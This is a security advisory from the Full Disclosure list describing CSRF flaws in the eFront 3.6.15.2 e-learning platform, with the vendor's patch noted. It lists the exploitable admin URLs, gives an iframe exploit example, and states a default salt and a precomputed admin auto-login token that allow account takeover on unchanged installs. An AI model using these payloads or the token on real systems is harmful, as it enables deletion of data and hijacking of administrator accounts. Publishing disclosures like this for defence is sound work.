Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)

[Steffen Rösemann <steffen.roesemann1986 () gmail com>]

Advisory: Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)
Advisory ID: SROEADV-2015-09
Author: Steffen Rösemann
Affected Software: eFront v. 3.6.15.2 (CE) (Release-date: 05-Dec-2014,
build 18021)
Vendor URL: http://www.efrontlearning.net
Vendor Status: patched
CVE-ID: -

Tested with/on:

-Browser: Firefox 35, Iceweasel 31.3.0
-OS: Mac OS X 10.10 (XAMPP installation), Kali Linux 1.0.9a (Apache2,
MySQL)

==========================
Vulnerability Description:
==========================

The E-learning platform eFront v. 3.6.15.2 (Community Edition, build 18021)
suffers from multiple CSRF vulnerabilities.

==================
Technical Details:
==================

The vulnerabilities can be found in different modules that are all used in
the administrator.php file:

ctg=modules (delete and deactivate/activate modules):

http://
{TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax

ctg=users (delete and deactivate/activate users):

http://
{TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax

ctg=themes (activate/deactivate and delete themes):

http://
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax

ctg=digest (deactivate/activate and delete events, e.g. deactivate user
registration, deactivate email for account activation)

e.g. EVENT_ID 3 = user email activation
e.g. EVENT_ID 4 = user registration

http://
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1

ctg=languages (deactivate/activate and delete language settings)

e.g. LANGUAGE_NAME = german

http://
{TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax


Exploit-Example (valid for all above listed vulnerabilities):

<iframe src="http://
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1"></iframe>


The following CSRF-vulnerability can be abused to activate/deactivate the
auto-login feature of an arbitrary user:

http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax


That makes it possible to login via a URL in an arbitrary user-account like
in the following example without providing any login-credentials:

http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN}

eFront creates three standard user-accounts while the installation process.
One of it is the administrators account.

The components being used for creating the auto-login token are the
following informations:

- a salt
- the accounts creation date
- the username

The salt isn't generated dynamically during the installation. On a common
eFront installation without any changes by the administrator, it has the
value cDWQR#$Rcxsc. The admin accounts creation date has the standard value
1365149958.

As the standard administrators accountname is "admin", the auto-login token
for the administrators account of eFront has always the value
eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that
none of the above mentioned values were changed after the installation.

That makes it possible for an attacker to abuse the CSRF-vulnerability to
gain access to the administrators account.



=========
Solution:
=========

Upgrade to eFront v. 3.6.15.3, build 18022.


====================
Disclosure Timeline:
====================
14/15-Jan-2015 – found the vulnerability
15-Jan-2015 - informed the developers (see [3])
15-Jan-2015 – release date of this security advisory [without technical
details]
15-Jan-2015 - vendor responded, announces a patch
05-Feb-2015 - vendor released patch (v. 3.6.15.3, build 18022)
05-Feb-2015 - release date of this security advisory
05-Feb-2015 - send to FullDisclosure


========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.efrontlearning.net
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-09.html
[3] https://github.com/epignosis/efront_open_source/issues/7
[4]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-09.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/